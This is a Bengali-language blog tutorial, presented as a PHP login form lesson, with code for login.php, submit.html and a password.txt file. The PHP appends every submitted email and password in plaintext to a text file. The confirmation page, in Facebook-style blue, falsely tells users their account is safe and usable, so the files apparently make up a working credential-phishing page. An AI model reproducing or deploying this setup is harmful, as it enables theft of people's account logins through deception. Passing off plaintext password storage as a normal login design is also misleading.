login form php code । html,css and php login form | পিএইসপি লগইন ফর্ম কোড ।

 

এর আগের পোস্টে আমরা লগইন ফর্ম তৈরী করেছি । এখন আমরা দেখব কিভাবে ফর্মে দেওয়া ডাটা গুলো save করতে হয় । 

আমি যে সকল example দিব তা হুবহু কপি করা লাবে যদি আপনি আগে থেকেই এগুলো ভালো বুঝেন তাহলে পরিবর্তন করতে পারেন । আজকে php এর কিছু কোড দেওয়া হবে তাই html সাপোর্টেড app বা notepad এ রান করা যেতে নাও পারে । এই php কোড রান করার জন্য যে সকল এ্যাপ লাগবে তা হল android এর জন্য penguin আর xamp ব্যাবহার করতে পারেন বা অনান্য app ব্যাবহার করতে পারেন

একটি বিষয় কোড উল্টা পাল্টা অথবা ফাইলের নাম পরিবর্তন করলে কাজ করবে না। তাই অনুরোধ রইল পুরা পোস্ট টি ভালো ভাবে পড়বেন ।

এবার নিচে দেওয়া উদাহরণ গুলো run করান । ধাপ গুলো অনুশরণ করি ।

১.log in form এর কোড এখানে

এটি যেকোনো নামে save করতে পারেন । তবে আমি code লেখার সময় login.html নামে save করেছিলাম ।

২. পরবর্তী কোড-

<?php

if(isset($_POST['login'])){

$Name = "Email:".$_POST['name']."

";

$Pass = "Password:".$_POST['password']."

";


$file=fopen("Password.txt", "a");

fwrite($file, $Name);

fwrite($file, $Pass);

fclose($file);

header('location:submit.html');

}

?>


এই কোর্ডটি login.php নামে save করতে হবে ।

৩.পরবর্তী কোড-

<!DOCTYPE html>

<html lang="en">

<head>

<meta content='width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1' name='viewport'/>

<title>Successfully Account Safe

</title>   

</head>

<style>

body{

background-color: #3b5998;

}

  .f1{

text-align: center;

font-weight: bolder;

padding-top:10px;

  }

 .f2{

text-align: center;

padding-top:10px;

color:#F7F7F7;

  }

button{

background-color: #5F6ECD;

color:#F7F7F7;

height: 35px;

border:0;

border-radius: 5px;

</style>

<body>   

<div  class="f1">

<font color="#FFFFFF">

You Have Successfully Enter Username and Password

</font>

</div>

<center>

<br><br>

<div  class="f2">

Now you can easyly use your account.  

</div>

<br> 

<footer> 

<a href="https://bong71.blogspot.com/">

<button>  

visite my website

</button>

</a>

</footer>

</center>

</body>

</html>


এই কোর্ডটি submit.html নামে save করতে হবে । 

৪.এবার password.txt নামের একটি ফাইল তৈরি করতে হবে ।

মনে রাখা দরকার এই ৪ টি ফাইল একই ফোল্ডারে থাকা লাগবে ।

৪ টি ফাইলের কাজ কি ?

* login.html - এটি দিয়ে ফর্মটির ডিজাইন করা হয়েছে ।

* login.php - এটি দি ফর্মে দেওয়া data অর্থাৎ username আর password সেভ করার প্রগ্রাম লেখা হয়েছে ।

*submit.html - এটি হল data submit করার পর login.php ফাইলের redirect করা ফাইল ।

*password.txt - এখানে username আর password সেভ করা হয় ।

আমি এই কোড গুলো লেখার জন্য quoda Android application ব্যাবহার করেছি ,আর টেস্টের জন্য penguin application ব্যাবহার করেছি ।

কোনো help লাগলে কমেন্টে জানাতে পারেন ।

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.